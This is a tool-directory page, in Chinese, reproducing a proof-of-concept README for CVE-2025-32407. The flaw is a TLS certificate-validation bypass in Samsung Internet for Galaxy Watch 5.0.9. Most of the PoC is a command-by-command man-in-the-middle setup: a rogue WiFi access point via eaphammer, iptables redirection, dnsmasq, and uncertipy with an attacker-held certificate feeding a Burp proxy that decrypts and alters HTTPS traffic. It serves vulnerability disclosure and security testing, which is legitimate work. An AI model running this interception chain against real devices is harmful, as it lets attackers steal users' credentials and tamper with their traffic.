Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32407 — 针对CVE-2025-32407的概念验证漏洞利用:三星Galaxy Watch上的三星互联网浏览器中的TLS证书验证绕过,使得能够对HTTPS流量进行中间人攻击。 | Kitploit
工具/GitHubGitHub/diegovargasj/cve-2025-32407
数据包嗅探与分析漏洞分析Web代理与拦截漏洞利用Web安全无线安全渗透测试移动安全DNS 分析
GitHubdiegovargasj/cve-2025-32407

CVE-2025-32407

针对CVE-2025-32407的概念验证漏洞利用:三星Galaxy Watch上的三星互联网浏览器中的TLS证书验证绕过,使得能够对HTTPS流量进行中间人攻击。

61年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

CVE-2025-32407

CVE-2025-32407 的概念验证:三星 Galaxy Watch 应用“Samsung Internet for Galaxy Watch”版本 5.0.9 中的 TLS 证书验证配置错误。

描述

Galaxy Watch 应用“Samsung Internet for Galaxy Watch”版本 5.0.9(支持至三星 Galaxy Watch 3)未正确验证 TLS 证书,攻击者可借此冒充用户访问的任何及所有网站。这是浏览器验证服务器身份方式中的严重配置错误,导致 HTTPS 作为安全信道失效,使得中间人攻击成为可能,进而窃取敏感信息或篡改传入与传出流量。

在此特定案例中,浏览器未验证证书域名是否与网站域名匹配。这意味着只要证书由受信任的证书颁发机构签名,浏览器便会接受任何为任意域名签发的 TLS 证书。攻击者可为其控制的域名获取免费证书,从而拦截应用产生的所有 TLS 连接。

PoC

本测试使用三星 Galaxy Watch 3 及“Samsung Internet for Galaxy Watch”最新版本(5.0.9)。请注意,此设备目前已不再支持。

应用版本

为辅助利用,我开发了一个工具,可动态拦截 TLS 通信并生成由我控制的 TLS 证书,从而能够解密并操纵传入与传出数据:https://github.com/diegovargasj/uncertipy。需要一个由真实 CA 签名的有效 TLS 证书及其密钥。可通过 Let's Encrypt API 及域名免费轻松完成。证书和密钥将分别存储于 /path/to/cert.pem 和 /path/to/key.pem。

有多种方式可拦截手表的通信,例如篡改 DNS 响应或将其连接至为此目的创建的 WiFi 接入点。我们采用后者,使用一台配备两个网络接口的计算机:wlan0 用于访问互联网,wlan1 用于部署 WiFi 接入点。

我将使用 eaphammer(https://github.com/s0lst1c3/eaphammer)部署 WiFi 接入点,您也可以使用其他任意工具。

root@kitploit:~
sudo ./eaphammer --auth wpa-psk --wpa-passphrase MyPassword --interface wlan1 --essid WLAB

现在,为接口分配 IP 地址:

root@kitploit:~
sudo ip addr add 10.0.0.1/24 dev wlan1

将流量重定向至本地端口 9900:

root@kitploit:~
sudo iptables -A INPUT -i wlan1 -j ACCEPT
sudo iptables -t nat -A PREROUTING -i wlan1 -p tcp -m tcp -j REDIRECT --to-ports 9900
sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

并启用 DHCP 和 DNS:

root@kitploit:~
sudo dnsmasq --no-daemon --interface wlan1 --dhcp-range=10.0.0.100,10.0.0.200 --log-dhcp --log-queries --bind-interfaces -C /dev/null

最后,启动 uncertipy 拦截端口 9900 上的 TLS 流量。该流量将被重定向至端口 8080 上的 HTTP 代理,用于日志记录:

root@kitploit:~
python3 uncertipy.py -a 0.0.0.0 -p 9900 -c /path/to/cert.pem  -k /path/to/key.pem  -m replaced_key -u 127.0.0.1:8080

现在,将手表连接至 WiFi 接入点,打开应用并导航至任意 HTTPS 网站。

浏览器 1

浏览器 2

uncertipy 工具将通知 TLS 拦截情况。

Uncertipy

HTTP 代理将开始拦截请求,其中可能包含敏感信息。此外,我们还可利用代理的功能修改传入或传出请求。

Burpsuite

应用应正常工作,显示网站内容。

三星

下载工具